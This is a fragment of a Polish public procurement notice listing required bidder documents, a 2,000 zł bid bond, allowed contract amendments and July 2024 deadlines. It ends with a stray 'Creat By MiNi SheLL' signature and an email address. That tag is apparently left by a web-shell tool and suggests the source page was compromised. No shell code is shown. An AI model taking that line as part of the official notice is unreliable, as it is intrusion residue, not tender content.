109<br/>ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem<br/>składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia<br/>dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w<br/>postępowaniu albo przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia<br/>społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>4) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>Dokumenty potwierdzające, że Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia na sumę 100 000 złotych;<br/>2) Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 4 do SWZ).<br/>3) Wykazuusług wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane<br/>oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane; wzór wykazu usług stanowi Załącznik nr 3 do SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Warunkiem udziału w postępowaniu jest wniesienie wadium w kwocie: 2 000,00 (dwa tysiące złotych). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o zamówienie (konsorcjum), każdy z tych wykonawców (członków<br/>konsorcjum) odrębnie składa oświadczenie, o którym mowa w ust.1 pkt1 Działu XIV SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w stosunku do<br/>treści oferty, na podstawie której dokonano wyboru Wykonawcy na poniższych warunkach:<br/>1) Zamawiający dopuszcza zmianę umowy w formie aneksu, w sytuacji zmiany obowiązujących<br/>przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. Zmiana<br/>wymaga zgłoszenia w formie pisemnej w ciągu 14 dni od powzięcia<br/>informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta może spowodować<br/>wydłużenie terminu wykonania prac i nie spowoduje zmiany wynagrodzenia Wykonawcy.<br/>Inicjatorem tej zmiany może być Zamawiający lub Wykonawca.<br/>2) Zamawiający dopuszcza zmianę umowy w formie aneksu w sytuacji, kiedy nastąpi ustawowa<br/>zmiana stawki VAT. Inicjatorem tej zmiany może być Zamawiający lub Wykonawca. Zmiana<br/>wymaga zgłoszenia w formie pisemnej w ciągu 14 dni od powzięcia informacji stanowiącej<br/>podstawę do wprowadzenia zmian. Zmiana ta nie wpłynie na termin wykonania prac, natomiast<br/>spowoduje zmianę wynagrodzenia Wykonawcy o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez<br/>Wykonawcę.<br/>3) Zamawiający dopuszcza zmianę umowy w formie aneksu w przypadku zmiany: a) wysokości minimalnego<br/>wynagrodzenia za pracę ustalonego na podstawie ustawy z dnia 10<br/>października 2002 r. o minimalnym wynagrodzeniu za pracę (t.j. Dz. U. z 2020 r. poz. 2207).<br/>b) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne. Jeżeli zmiany te będą<br/>miały wpływ na koszty wykonania zamówienia przez Wykonawcę. Zmiana wymaga zgłoszenia w<br/>formie pisemnej w ciągu 7 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta nie<br/>wpłynie na termin wykonania zamówienia, natomiast spowoduje zmianę<br/>wynagrodzenia Wykonawcy; 4) Zamawiający dopuszcza zmianę osób biorących po stronie Wykonawcy udział w realizacji<br/>przedmiotu umowy, w sytuacji zdarzeń losowych oraz w przypadku niewywiązywania się z<br/>pełnionych obowiązków. Inicjatorem zmiany może być Zamawiający i Wykonawca. Zmiana musi<br/>nastąpić na osoby, które spełniają warunki określone w zapytaniu. Zmiana wymaga zgłoszenia<br/>w formie pisemnej w ciągu 3 dni od powzięcia informacji stanowiącej podstawę do<br/>wprowadzenia zmian. Zamiana ta wymaga zgody Zamawiającego. Zmiana ta nie wpłynie na<br/>termin wykonania prac i nie spowoduje zmiany wynagrodzenia Inżyniera.<br/>6) Zamawiający, po wyrażeniu zgody, dopuszcza zmianę terminu realizacji umowy w formie<br/>aneksu, w przypadku:<br/>a) wystąpienia nieprzewidzianych warunków i zjawisk atmosferycznych (kataklizmy),<br/>b) wystąpienia siły wyższej np.: trąby powietrznej, pożaru, powodzi,<br/>c) konieczności wykonania zamiennej dokumentacji projektowej,<br/>d) konieczności przeprowadzenia nieprzewidzianych uzgodnień prawnych lub technicznych,<br/>e) wstrzymania budowy przez właściwy organ z przyczyn niezależnych od Wykonawcy robót<br/>budowlanych, np.: dokonanie odkrywki archeologicznej, odkrycie niewybuchu itp.<br/>f) wystąpienia przedłużenia się okresu osiągania parametrów technologicznych niezależnego od Wykonawcy. Inicjatorem<br/>tych zmian może być Wykonawca lub Zamawiający. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 3 dni od<br/>powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta wpłynie na termin wykonania prac i nie spowoduje zmiany wynagrodzenia Wykonawcy.<br/>7) Zamawiający dopuszcza zmianę terminu realizacji umowy, w przypadku wydłużenia czasu realizacji Inwestycji, będącej<br/>przedmiotem nadzoru. Inicjatorem tych zmian może być Zamawiający. Zmiana ta wymaga zgłoszenia w formie pisemnej w<br/>ciągu 3 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta wpłynie na termin wykonania<br/>prac i nie spowoduje zmiany wysokości wynagrodzenia Wykonawcy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-26 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę poprzez portal ezamówienia. Szczegółowy sposób złożenia oferty, opisany został w instrukcji interaktywnej „Oferty, wnioski i prace konkursowe” dostępnej w zakładce „Centrum Pomocy” pod adresem https://ezamowienia.gov.pl/pl/komponent-edukacyjny/ .</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-26 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-25</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com